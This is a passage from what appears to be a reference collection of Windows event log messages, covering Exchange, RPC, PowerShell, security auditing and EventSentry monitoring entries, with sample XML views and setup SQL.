at Microsoft.Search.Administration.Security.HOSTSFile.ConfigureDedicatedGathering(SearchServiceInstance searchServiceInstance, SPServer dedicatedWebFrontEndServer, IList`1 previousWebApplicationHostNames)
at Microsoft.Office.Server.Search.Administration.SearchServiceInstance.SynchronizeDefaultContentSource(IDictionary applications)
at Microsoft.Office.Server.Search.Administration.SearchServiceInstance.Synchronize()
at Microsoft.Office.Server.Administration.ApplicationServerJob.ProvisionLocalSharedServiceInstances(Boolean isAdministrationServiceJob)
Message:
Could not get performance counter registry information for WSearchIdxPi for instance due to the following error: The operation completed successfully. 0x0.
Message:
Performance monitoring cannot be initialised for the gatherer object, because the counters are not loaded or the shared memory object cannot be opened. This only affects availability of the perfmon counters. Restart the computer.
Context: Application, SystemIndex Catalogue
Message:
Performance monitoring cannot be initialised for the gatherer service, because the counters are not loaded or the shared memory object cannot be opened. This only affects availability of the perfmon counters. Restart the computer.
Message:
The driver \Driver\WUDFRd failed to load for the device SWD\WPDBUSENUM\{e21c02d7-760e-11e3-be76-806e6f6e6963}#000000000003F000.
Message:
The description for Event ID 27 from source e1iexpress cannot be found. Either the component that raises this event is not installed on your local computer or the installation is corrupted. You can install or repair the component on the local computer.
If the event originated on another computer, the display information had to be saved with the event.
The following information was included with the event:
Intel(R) 82583V Gigabit Network Connection
the message resource is present but the message is not found in the string/message table
Message:
Display driver amdkmdap stopped responding.
Message:
windows security center service could not stop windows defender
Message:
Unable to open the Server service performance object. The first four bytes (DWORD) of the Data section contains the status code.
Message:
There are currently no logon servers available to service the logon request.
This may lead to authentication problems. Make sure that this computer is connected to the network. If the problem persists, please contact your domain administrator.
Category:
Logging/Recovery
Message:
LiveComm (6812) C:\Users\Marion\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\LiveComm\d7436ff03206bcfd\120712-0049\: The shadow header page of file C:\Users\Marion\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\LiveComm\d7436ff03206bcfd\120712-0049\DBStore\livecomm.edb was damaged. The primary header page (8192 octets) was used instead.
Message:
Windows XP WIC installation failed.
Access is denied.
Message:
[ warning] [vmusr:vmtoolsd] Failed registration of app type 2 (Signals) from plugin unity.
Source:
Microsoft-Windows-CertificateServicesClient-CertEnroll
Message:
Certificate enrollment for Local system failed to enroll for a DomainController certificate with request ID N/A from testsql.domain.local\TESTCA (The RPC server is unavailable. 0x800706ba (WIN32: 1722)).
Message:
This computer was not able to set up a secure session with a domain controller in domain NETIKUS due to the following:
There are currently no logon servers available to service the logon request.
This may lead to authentication problems. Make sure that this computer is connected to the network. If the problem persists, please contact your domain administrator.
ADDITIONAL INFO
If this computer is a domain controller for the specified domain, it sets up the secure session to the primary domain controller emulator in the specified domain. Otherwise, this computer sets up the secure session to any domain controller in the specified domain.
Source:
Microsoft-Windows-IIS-W3SVC-PerfCounters
Message:
It has taken too long to refresh the W3SVC counters, the stale counters are being used instead.
Source:
MSExchange Mid-Tier Storage
Message:
Ping of mdb 'b001e27b-bd30-4b98-998d-d0baf7803fba' timed out after '00:00:00' minutes. Last successful ping was at '6/10/2014 11:50:11 AM' UTC.
Source:
MSExchange EdgeSync
Message:
Initialization failed with exception: Microsoft.Exchange.EdgeSync.Common.EdgeSyncServiceConfigNotFoundException: Couldn't find EdgeSync service configuration object for the site SiteName. If the configuration object doesn't exist in the Active Directory location CN=EdgeSyncService,CN=SiteName,CN=Sites,CN=Configuration,DC=domain,DC=local, create it using the New-EdgeSyncServiceConfig cmdlet. If the object does exist, check its permissions.. If this warning frequently occurs, contact Microsoft Product Support.
Message:
The default transaction resource manager on volume C: encountered a non-retryable error and could not start. The data contains the error code.
<Keywords>0x80000000000000</Keywords>
Source:
RPC (Microsoft-Windows-RPC-Events)
Message:
Possible Memory Leak. Application (C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted) (PID: 980) has passed a non-NULL pointer to RPC for an [out] parameter marked [allocate(all_nodes)]. [allocate(all_nodes)] parameters are always reallocated; if the original pointer contained the address of valid memory, that memory will be leaked. The call originated on the interface with UUID ({3f31c91e-2545-4b7b-9311-9529e8bffef6}), Method number (10). User Action: Contact your application vendor for an updated version of the application.
Detailed XML View
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-RPC-Events" Guid="{F4AED7C7-A898-4627-B053-44A7CAA12FCD}" />
<EventID>11</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2014-07-21T09:20:57.835029200Z" />
<EventRecordID>136</EventRecordID>
<Correlation />
<Execution ProcessID="980" ThreadID="112" />
<Channel>Application</Channel>
<Computer>Pochi-01</Computer>
<Security UserID="S-1-5-19" />
</System>
- <EventData>
<Data Name="ApplicationName">C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted</Data>
<Data Name="ProcessId">980</Data>
<Data Name="InterfaceId">{3F31C91E-2545-4B7B-9311-9529E8BFFEF6}</Data>
<Data Name="Method">10</Data>
</EventData>
</Event>
Message:
Der Dienststatus von Dienst eventsentryheartbeatmonitor (EventSentry Heartbeat Monitor) ist weiterhin Stopped.
Zusätzliche Dienstinformationen:
Starttyp: Automatic
EXE-Datei: C:\WINDOWS\SYSWOW64\EVENTSENTRY\EVENTSENTRY_HB_SVC.EXE
Benutzerkonto: LocalSystem
Message:
ERROR: duplicate key value violates unique constraint "idx_es_logontracking_unique"
DETAIL: Key (computername, username, start_unix, logonid)=(2, 30, 1409919385, 0xedeedc2f) already exists.
STATEMENT: insert into eventsentry.ESLogonTracking (start_unix,start_datetime,computername,groupname,username,LogonID,SourceIP,SourceComputer,ComputerProductType,eventnumber,RemoteDesktopState,incomplete,duration,LogonType,IsSession) values(1409919385,'2014-09-05 12:16:25'::timestamp,2,3,30,'0xedeedc2f',3,13,'SRV',0,1,0,0,10,1)
Source:
MSExchangeIS Mailbox Store
Category:
Content Indexing
Message:
Content Indexing function 'CISearch::EcGetRowsetAndAccessor' received an unusual and unexpected error code from MSSearch.
Mailbox Database: Mailbox Database
Error Code: 0x80041606
Category:
NTP Synchronization
Message:
EventSentry was unable to retrieve the current time from host ntp.mydomain.local due to the following error: Server time not synchronised.
Source:
Microsoft-Windows-Time-Service
Message:
NtpClient was unable to set a domain peer to use as a time source because of discovery error. NtpClient will try again in 15 minutes and double the reattempt interval thereafter. The error was: The entry is not found. (0x800706E1)
Source:
Service Control Manager
Message:
De Windows Presentation Foundation Font Cache 3.0.0.0-service is bij het starten vastgelopen.
Source:
MSExchangeIS Mailbox
Category:
Content Indexing
Message:
Function CISearch::EcGetRowsetAndAccessor detected that content indexing was disabled for database "Mailbox Database 1144709849" because of error "0x80041820" from MSSearch.
Source:
Windows Server Update Services
Message:
No client computers have ever contacted the server.
Source:
Microsoft-Windows-CAPI2
Message:
Reached crypt32 threshold of 50 events and will suspend logging for 60 minutes.
Source:
Server Administrator
Message:
Log size is no longer near or at capacity
Log type: ESM
Message:
The following fatal alert was received: 42.
Message:
WUDFHost (8232) WindowsLocationProviderDatabase: An attempt to open the file "C:\ProgramData\Microsoft\Windows\LocationProvider\edbtmp.log" for read / write access failed with system error 5 (0x00000005): "Access is denied. ". The open file operation will fail with error -1032 (0xfffffbf8).
Source:
Microsoft-Windows-CAPI2
Message:
Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.
System Error:
Access is denied.
Source:
MSExchangeTransport
Message:
Receive connector Allow SMTP rejected an incoming connection from IP address 1.2.3.4. The maximum number of connections per source (20) for this connector has been reached by this source IP address.
Source:
MSExchangeTransport
Message:
A message with the Internal Message ID 12345 was rejected by the remote server. This message will be deferred and retried because it was marked for retry if rejected. Other messages may also have encountered this error.
Message:
The attempt by user DOMAIN\someuser to logoff computer WKS123 failed
Message:
Windows cannot determine the user or computer name. (Not enough storage is available to complete this operation. )
Source:
RPC (Microsoft-Windows-RPC-Events)
Message:
Log Name: Application
Source: Microsoft-Windows-RPC-Events
Date: 22/07/2015 13:43:53
Event ID: 11
Task Category: None
Level: Warning
Keywords:
User: LOCAL SERVICE
Computer: UNDERTHEBED7-PC
Description:
Possible Memory Leak. Application (C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted) (PID: 940) has passed a non-NULL pointer to RPC for an [out] parameter marked [allocate(all_nodes)]. [allocate(all_nodes)] parameters are always reallocated; if the original pointer contained the address of valid memory, that memory will be leaked. The call originated on the interface with UUID ({3f31c91e-2545-4b7b-9311-9529e8bffef6}), Method number (20). User Action: Contact your application vendor for an updated version of the application.
Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-RPC-Events" Guid="{F4AED7C7-A898-4627-B053-44A7CAA12FCD}" />
<EventID>11</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2015-07-22T12:43:53.117673400Z" />
<EventRecordID>138</EventRecordID>
<Correlation />
<Execution ProcessID="940" ThreadID="1592" />
<Channel>Application</Channel>
<Computer>UNDERTHEBED7-PC</Computer>
<Security UserID="S-1-5-19" />
</System>
<EventData>
<Data Name="ApplicationName">C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted</Data>
<Data Name="ProcessId">940</Data>
<Data Name="InterfaceId">{3F31C91E-2545-4B7B-9311-9529E8BFFEF6}</Data>
<Data Name="Method">20</Data>
</EventData>
</Event>
Source:
RPC (Microsoft-Windows-RPC-Events)
Message:
Log Name: Application
Source: Microsoft-Windows-RPC-Events
Date: 22/07/2015 13:43:53
Event ID: 11
Task Category: None
Level: Warning
Keywords:
User: LOCAL SERVICE
Computer: UNDERTHEBED7-PC
Description:
Possible Memory Leak. Application (C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted) (PID: 940) has passed a non-NULL pointer to RPC for an [out] parameter marked [allocate(all_nodes)]. [allocate(all_nodes)] parameters are always reallocated; if the original pointer contained the address of valid memory, that memory will be leaked. The call originated on the interface with UUID ({3f31c91e-2545-4b7b-9311-9529e8bffef6}), Method number (20). User Action: Contact your application vendor for an updated version of the application.
Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-RPC-Events" Guid="{F4AED7C7-A898-4627-B053-44A7CAA12FCD}" />
<EventID>11</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2015-07-22T12:43:53.117673400Z" />
<EventRecordID>138</EventRecordID>
<Correlation />
<Execution ProcessID="940" ThreadID="1592" />
<Channel>Application</Channel>
<Computer>UNDERTHEBED7-PC</Computer>
<Security UserID="S-1-5-19" />
</System>
<EventData>
<Data Name="ApplicationName">C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted</Data>
<Data Name="ProcessId">940</Data>
<Data Name="InterfaceId">{3F31C91E-2545-4B7B-9311-9529E8BFFEF6}</Data>
<Data Name="Method">20</Data>
</EventData>
</Event>
Message:
The first Critical Blacklist Event found: Event ID - 1054 System log - Microsoft-Windows-GroupPolicy: The processing of Group Policy failed. Windows could not obtain the name of a domain controller. This could be caused by a name resolution failure. Verify your Domain Name System (DNS) is configured and working correctly.
Source:
Microsoft-Windows-WER-SystemErrorReporting
Message:
The computer has rebooted from a bugcheck. The bugcheck was: 0x00000116 (0xffffe0008b64c4c0, 0xfffff8003e9d4650, 0x0000000000000000, 0x000000000000000d). A dump was saved in: C:\WINDOWS\MEMORY.DMP. Report Id: 10281589-8be9-d71c-c713-e024f5515a45.
Source:
Microsoft-Windows-WMI
Message:
Windows Management Instrumentation has stopped WMIPRVSE.EXE because a quota reached a warning value. Quota: HandleCount Value: %2 Maximum value: 4096 WMIPRVSE PID: %4 Providers hosted in this process: %systemroot%\system32\wbem\cimwin32.dll
Source:
IIS-Configuration
Message:
Changes to '/system.applicationHost/sites/site[@name="Default Web Site" and @id="1"]/@state' at 'MACHINE/WEBROOT/APPHOST' have successfully been committed.
Category:
Heartbeat Monitoring
Message:
Starting with EventSentry build 3.2.1.28, the heartbeat agent can query the EventSentry database to determine a remote agent status, instead of querying the remote agent status using the Windows API. This can drastically improve the monitoring speed and is recommended for networks consisting of 50 or more Windows hosts.
To enable this functionality, the following SQL query will need to be executed on the EventSentry database:
--Built-In Database (PostgreSQL)
REVOKE ALL ON TABLE eventsentry.essysinfo FROM eventsentry_svc;
GRANT SELECT, UPDATE, INSERT, DELETE ON TABLE eventsentry.essysinfo TO eventsentry_svc;
-- SQL Server
GRANT SELECT ON ESSysinfo (UptimeTimestamp) TO eventsentry_svc
-- MySQL
GRANT SELECT (computer, Uptime, UptimeMax, UptimeTimestamp), INSERT, UPDATE, UPDATE (UptimeTimestamp, lastserverinventoryupdate), DELETE ON essysinfo TO eventsentry_svc
It is also recommended to set the "Refresh uptime every" interval in the "Inventory" System Health package to 5 minutes.
Message:
Outlook disabled the following add-in(s):
ProgID: GDOfficeAddin.AddinBase
GUID: {0C2EB69C-2B8F-408B-A2C6-E831D1A6C774}
Name: G Data Outlook Add-In
Description: G Data Outlook Add-In
Load Behavior: 3
HKLM: 1
Location: c:\program files (x86)\common files\g data\avkmail\gdofficeaddinx86.dll
Threshold Time (Milliseconds): 1000
Time Taken (Milliseconds): 120875
Disable Reason: This add-in caused Outlook to start slowly.
Policy Exception (Allow List): 0
Source:
MSExchange MailTips
Message:
Process Microsoft.Exchange.InfoWorker.Common.Delayed`1[System.String]: MailTips query failed for mailbox <John Johnny JoeJoe>SMTP:jonjojo@acmecorp.com. Latency: total:1. The returned exception is: Microsoft.Exchange.Data.Storage.StorageTransientException: Cannot open mailbox /o=AcmeCorp/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=EXCHGSERVER/cn=Microsoft System Attendant. ---> Microsoft.Mapi.MapiExceptionRpcServerTooBusy: MapiExceptionRpcServerTooBusy: Unable to make connection to the server. (hr=0x80004005, ec=2419)
Diagnostic context:
Lid: 41841 StoreEc: 0x973
Lid: 51059
Lid: 62321 StoreEc: 0x973
Lid: 47987
Lid: 50033 StoreEc: 0x973
Lid: 50544 ClientVersion: 15.0.995.27
Lid: 52080 StoreEc: 0x973
Lid: 51152
Lid: 52465 StoreEc: 0x973
Lid: 60065
Lid: 33777 StoreEc: 0x973
Lid: 59805
Lid: 52487 StoreEc: 0x973
Lid: 19778
Lid: 27970 StoreEc: 0x973
Lid: 17730
Lid: 25922 StoreEc: 0x973
at Microsoft.Mapi.MapiExceptionHelper.InternalThrowIfErrorOrWarning(String message, Int32 hresult, Boolean allowWarnings, Int32 ec, DiagnosticContext diagCtx, Exception innerException)
at Microsoft.Mapi.MapiExceptionHelper.ThrowIfError(String message, Int32 hresult, IExInterface iUnknown, Exception innerException)
Source:
Microsoft-Windows-Defrag
Message:
The volume WINRE_DRV was not optimized because an error was encountered: The parameter is incorrect. (0x80070057)
Source:
MSExchangeDiagnostics
Message:
Potential data loss warning in RetentionAgent: %1
Source:
MSExchange Store Driver Submission
Message:
The store driver failed to submit eventID mailboxID MDBID and couldn't generate an NDR due to exception Microsoft.Exchange.MailboxTransport.StoreDriverCommon.InvalidSenderException
Category:
Heartbeat Monitoring
Message:
SNMP or agent monitoring of host SOMESERVER has failed 17% of the time over the last 3600 seconds and is now disabled. To re-enable SNMP and/or agent monitoring of host SOMESERVER, restore full connectivity to the remote host, locate the host in the management console and click the "Retry" button in the summary view.
Category:
Heartbeat Monitoring
Message:
EventSentry was unable to retrieve SNMP data from host somedevice.company.com and cannot monitor this host using SNMP. This event is being logged because this host was successfully monitored via SNMP in the past. To retry, open the management console, select the host and click the retry button on the top right.
Source:
MSExchangeDiagnostics
Message:
ConnectionStringManager unable to connect to partitioning DB: Connection string used to access the partitioning DB is null or empty
Source:
MSExchangeApplicationLogic
Message:
Scenario: ProcessKillBit. Failed to read killbit list file because of exception System.IO.IOException: The process cannot access the file 'D:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\owa\prem\15.0.1178.9\ext\killbit\killbit.xml' because it is being used by another process.
at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost)
at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options, String msgPath, Boolean bFromProxy)
at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share)
at System.IO.File.Open(String path, FileMode mode, FileAccess access, FileShare share)
at Microsoft.Exchange.Data.ApplicationLogic.Extension.KillBitHelper.TryReadKillBitFile(Int32& refreshRate, DateTime& lastModifiedTime)
Source:
MSExchangeFrontEndTransport
Message:
The Ehlo options for the client proxy target 10.10.5.123 did not match while setting up proxy for user amata/es_smtp on inbound session 08D40BBF5D3046B3. The mismatched settings might cause some messages to get rejected. Continue with proxying even though there is a mismatch. The critical non-matching options were maxSize. The non-critical non-matching options were .
Source:
Windows Server Update Services
Message:
The catalog was last synchronized successfully 1 or more days ago.
Source:
Server Administrator
Category:
Storage Service
Message:
Controller battery is discharging: Battery 0 Controller 0
Message:
Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface. hr = 0x80070005, Access is denied.
. This is often caused by incorrect security settings in either the writer or requestor process.
Operation:
Gathering Writer Data
Context:
Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
Writer Name: System Writer
Writer Instance ID: {e720aa26-50d9-4d36-93f3-494b8ec76700}
Message:
svchost (852) A significant portion of the database buffer cache has been written out to the system paging file. This may result in severe performance degradation.
See help link for complete details of possible causes.
Resident cache has fallen by 5426 buffers (or 99%) in the last 8805 seconds.
Current Total Percent Resident: 0% (2 of 5428 buffers)
Source:
Microsoft-Windows-DNS-Server-Service
Message:
Zone somedomain.local expired before it could obtain a successful zone transfer or update from a master server acting as its source for the zone. The zone has been shut down.
Category:
Service Monitoring
Message:
The status for service mapsbroker (Downloaded Maps Manager) remains Stopped.
Additional Service Information:
Startup type: Automatic
Executable: C:\Windows\System32\svchost.exe -k NetworkService
Service account: NT AUTHORITY\NetworkService
Source:
Citrix System Monitoring
Message:
The Queue thread stopped responding. The Citrix System Monitoring Agent will shutdown and restart.
Category:
Collector Client
Message:
The EventSentry agent successfully established a secure connection with the collector (collector.yourdomain.com at port 5001).
Negotiated SSL parameters: Protocol: TLS1.2 Cipher: AES Cipher strength: 128 Hash: SHA256 Hash strength: 256 Key exchange: RSA Key exchange strength: 2048
Message:
The filter chain for event log package Filter Chain ABC is complete.
Duration: 34 second(s)
Insertion Strings (if any):
Message:
Product: Microsoft Office Professional Plus 2016 - Update '{E296D50E-EFEB-48F5-9CBE-5A335AE2D49F}' could not be installed. Error code 1603. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127
Message:
DCOM got error "2147944122" from the computer 10.10.10.x when attempting to activate the server {4CB43D7F-7EEE-4906-8698-60DA1C38F2FE}
Message:
The following fatal alert was generated: 10. The internal error state is 1203. Another Event message is listed next;
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The SSL connection request has failed
Source:
Trend Status Check (AV)
Message:
Automated remediation failed. Antivirus Product Trend Status Check - 547 Days Out-Of-Date
Message:
the following fatal alert was received 70
Message:
The IPMI device driver attempted to communicate with the IPMI BMC device during normal operation. However the communication failed due to a timeout. You can increase the timeouts associated with the IPMI device driver.
Source:
Service Control Manager Eventlog Provider
Message:
The windows Modules Installer Service failed to start due to the following error:The Service did not start due to a logon failure
Category:
Engine Lifecycle
Message:
Engine state is changed from None to Available.
Details:
NewEngineState=Available
PreviousEngineState=None
SequenceNumber=134
HostName=ConsoleHost
HostVersion=2.0
HostId=e14c96d4-bf0d-4a3a-8e84-c7851ebb29d7
EngineVersion=2.0
RunspaceId=7b090c70-10a9-43d7-9ce4-15a8b1bc0e0b
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=
Category:
Engine Lifecycle
Message:
Engine state is changed from Available to Stopped.
Details:
NewEngineState=Stopped
PreviousEngineState=Available
SequenceNumber=125
HostName=ConsoleHost
HostVersion=2.0
HostId=e668b266-c1e3-4faa-2242-90c012cd4691
EngineVersion=2.0
RunspaceId=ed6416ce-3230-40b2-9d58-c5b709b4f3d9
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=
Category:
Command Lifecycle
Message:
Command "Write-Host" is Started.
Details:
NewCommandState=Started
SequenceNumber=19
HostName=ConsoleHost
HostVersion=2.0
HostId=1cf19884-fbfb-4930-859a-45bb18793e35
EngineVersion=2.0
RunspaceId=52cbe49e-d6ed-4690-9cff-b96759ed4894
PipelineId=2
CommandName=Write-Host
CommandType=Cmdlet
ScriptName=
CommandPath=
CommandLine=Write-Host Test
Category:
Command Lifecycle
Message:
Command "Write-Host" is Stopped.
Details:
NewCommandState=Stopped
SequenceNumber=20
HostName=ConsoleHost
HostVersion=2.0
HostId=1cf19884-fbfb-4930-859a-45bb18793e35
EngineVersion=2.0
RunspaceId=52cbe49e-d6ed-4690-9cff-b96759ed4894
PipelineId=2
CommandName=Write-Host
CommandType=Cmdlet
ScriptName=
CommandPath=
CommandLine=Write-Host Test
Category:
Provider Lifecycle
Message:
Provider "Registry" is Started.
Details:
ProviderName=Registry
NewProviderState=Started
SequenceNumber=6
HostName=ConsoleHost
HostVersion=2.0
HostId=81e282e6-724d-4184-9600-615816366546
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=
Category:
Pipeline Execution Details
Message:
Pipeline execution details for command line: Write-Host Test.
Context Information:
DetailSequence=1
DetailTotal=1
SequenceNumber=50
UserId=DOMAIN\username
HostName=ConsoleHost
HostVersion=4.0
HostId=5f2b609e-c195-4914-b7bb-09f492cb0056
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EngineVersion=4.0
RunspaceId=77d31d66-4314-43f4-bf5a-caa6757c2130
PipelineId=8
ScriptName=
CommandLine=Write-Host Test
Details:
CommandInvocation(Write-Host): "Write-Host"
ParameterBinding(Write-Host): name="Object"; value="Test"
Source:
Microsoft-Windows-PowerShell
Category:
Executing Pipeline
Message:
Error Message = File C:\Users\wizard\test.ps1 cannot be loaded. The file C:\Users\wizard\test.ps1 is not digitally signed. You cannot run this script on the current system. For more information about running scripts and setting execution policy, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
Fully Qualified Error ID = UnauthorizedAccess
Recommended Action =
Context:
Severity = Warning
Host Name = ConsoleHost
Host Version = 5.1.14393.1944
Host ID = babd41a2-db0f-45d0-ac50-e34b71dd9ac0
Host Application = powershell . .\test.ps1
Engine Version = 5.1.14393.1944
Runspace ID = 0155307c-603a-440d-a22c-85b5c9cbffff
Pipeline ID = 1
Command Name =
Command Type =
Script Name =
Command Path =
Sequence Number = 15
User = DOMAIN\user
Connected User =
Shell ID = Microsoft.PowerShell
User Data:
Source:
Microsoft-Windows-PowerShell
Category:
Executing Pipeline
Message:
CommandInvocation(Write-Host): "Write-Host"
ParameterBinding(Write-Host): name="Object"; value="TestPowerShellV5"
Context:
Severity = Informational
Host Name = ConsoleHost
Host Version = 5.1.14393.1944
Host ID = e44f3df1-0f65-48dc-814a-01219d11a426
Host Application = powershell Write-Host TestPowerShellV5
Engine Version = 5.1.14393.1944
Runspace ID = 0b4180d7-55ca-476a-9712-26e61d5c3be1
Pipeline ID = 1
Command Name = Write-Host
Command Type = Cmdlet
Script Name =
Command Path =
Sequence Number = 16
User = DOMAIN\username
Connected User =
Shell ID = Microsoft.PowerShell
User Data:
Source:
Microsoft-Windows-PowerShell
Category:
PowerShell Console Startup
Message:
PowerShell console is starting up
Source:
Microsoft-Windows-PowerShell
Category:
PowerShell Console Startup
Message:
PowerShell console is ready for user input
Source:
Microsoft-Windows-PowerShell
Category:
Execute a Remote Command
Message:
Creating Scriptblock text (1 of 1):
Write-Host PowerShellV5ScriptBlockLogging
ScriptBlock ID: 6d90e0bb-e381-4834-8fe2-5e076ad267b3
Path:
Source:
Microsoft-Windows-Security-Auditing
Category:
Other Logon/Logoff Events
Message:
A session was disconnected from a Window Station.
Subject:
Account Name: some.user
Account Domain: SOMEDOMAIN
Logon ID: 0x2335b249
Session:
Session Name: RDP-Tcp#0
Additional Information:
Client Name: wksclient04.lo
Client Address: 192.168.1.6
Source:
Microsoft-Windows-Security-Auditing
Category:
Process Termination
Message:
A process has exited.
Subject:
Security ID: MYDOMAIN\some.user
Account Name: some.user
Account Domain: MYDOMAIN
Logon ID: 0x5E006051
Process Information:
Process ID: 0x5ec4
Process Name: C:\Windows\System32\dllhost.exe
Exit Status: 0x0
Message:
SQL Server Scheduled Job 'sqlmail test' (0x1C727E7088AC614399AAD98E792DB21C) - Status: Failed - Invoked on: 2018-02-21 07:25:00 - Message: The job failed. The Job was invoked by Schedule 28 (SQL Mail test). The last step to run was step 1 (1).
For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
Message:
The virtual storage filter driver is inactive for ide disk at location (2,0,0,0)
Message:
failed extract of third party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: not enough staorage is available to complete this operation
Source:
Service Control Manager
Message:
The Routing and Remote Access service terminated with the following service-specific error: The callback function must be invoked inline.
Message:
The currently configured accounting provider failed to load and initialize successfully. The connection was prevented because of a policy configured on your RAS/VPN server. Specifically, the authentication method used by the server to verify your username and password may not match the authentication method configured in your connection profile. Please contact the Administrator of the RAS server and notify them of this error.
Source:
Report Server (SSRS)
Message:
Log Name: Application
Source: Report Server (SSRS)
Date: 8/12/2020 5:17:12 PM
Event ID: 108
Task Category: (2)
Level: Error
Keywords: Classic
User: N/A
Computer: MASKED.org
Description:
Report Server (SSRS)
Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Report Server (SSRS)" />
<EventID Qualifiers="0">108</EventID>
<Level>2</Level>
<Task>2</Task>
<Keywords>0x80000000000000</Keywords>
<TimeCreated SystemTime="2020-08-12T22:17:12.323342900Z" />
<EventRecordID>59464</EventRecordID>
<Channel>Application</Channel>
<Computer>MASKED.org</Computer>
<Security />
</System>
<EventData>
<Data>Report Server (SSRS)</Data>
<Data>ORACLE</Data>
</EventData>
</Event>
Source:
USB\VID_18D1&PID_4EE7&MI_03\7&16246af8&3&0003
Category:
Microsoft-Windows-Kernel-PnP
Message:
2020-12-25 4:37:06 PM Device USB\VID_18D1&PID_4EE7&MI_03\7&16246af8&3&0003 was configured.
Message:
Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = LT-MULLINTI; User = LT-MULLINTI\mtscadmin; ClientProcessId = 8944; Component = Unknown; Operation = Start IWbemServices::ExecNotificationQuery - ROOT\WMI : SELECT * FROM MSNdis_StatusMediaConnect; ResultCode = 0x80041032; PossibleCause = Unknown
Category:
Exécution du pipeline
Message:
Message d’erreur = Paramètre incorrect.
Nom du fournisseur = Microsoft.PowerShell.Core\FileSystem
Contexte :
Gravité = Warning
Nom d’hôte = InstallShield_PS_Host
Version de l’hôte = 1.0.0.0
ID d’hôte = a0925d75-baf4-4609-b69b-8d14a9f85b42
Application hôte = C:\Windows\System32\MsiExec.exe -Embedding 99CAFEB8759CB269DF3B8F5AE58B9B8D
Version du moteur =
ID d’instance d’exécution =
ID de pipeline =
Nom de commande =
Type de commande =
Nom du script =
Chemin de la commande =
Numéro de séquence = 18
Utilisateur = DESKTOP-T0MA7N9\pc2
Utilisateur connecté =
ID d’interpréteur de commandes = Microsoft.PowerShell
Données utilisateur :
Message:
The winlogon notification subscriber <GPClient> was unavailable to handle a notification event.
Category:
Engine Lifecycle
Message:
Details:
NewEngineState=Stopped
PreviousEngineState=Available
SequenceNumber=15
HostName=ConsoleHost
HostVersion=5.1.19041.610
HostId=fc1e08f5-6fa2-4b1f-b078-71504abeb1c1
HostApplication=powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';
EngineVersion=5.1.19041.610
RunspaceId=2825a70e-71d0-4804-9516-922aee2bdbfe
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=
Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="PowerShell" />
<EventID Qualifiers="0">403</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>4</Task>
<Opcode>0</Opcode>
<Keywords>0x80000000000000</Keywords>
<TimeCreated SystemTime="2021-04-09T00:48:26.1133783Z" />
<EventRecordID>40</EventRecordID>
<Correlation />
<Execution ProcessID="0" ThreadID="0" />
<Channel>Windows PowerShell</Channel>
<Computer>DESKTOP-BSLE0HC</Computer>
<Security />
</System>
<EventData>
<Data>Stopped</Data>
<Data>Available</Data>
<Data> NewEngineState=Stopped
PreviousEngineState=Available
SequenceNumber=15
HostName=ConsoleHost
HostVersion=5.1.19041.610
HostId=fc1e08f5-6fa2-4b1f-b078-71504abeb1c1
HostApplication=powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';
EngineVersion=5.1.19041.610
RunspaceId=2825a70e-71d0-4804-9516-922aee2bdbfe
PipelineId=
CommandName=
CommandType=
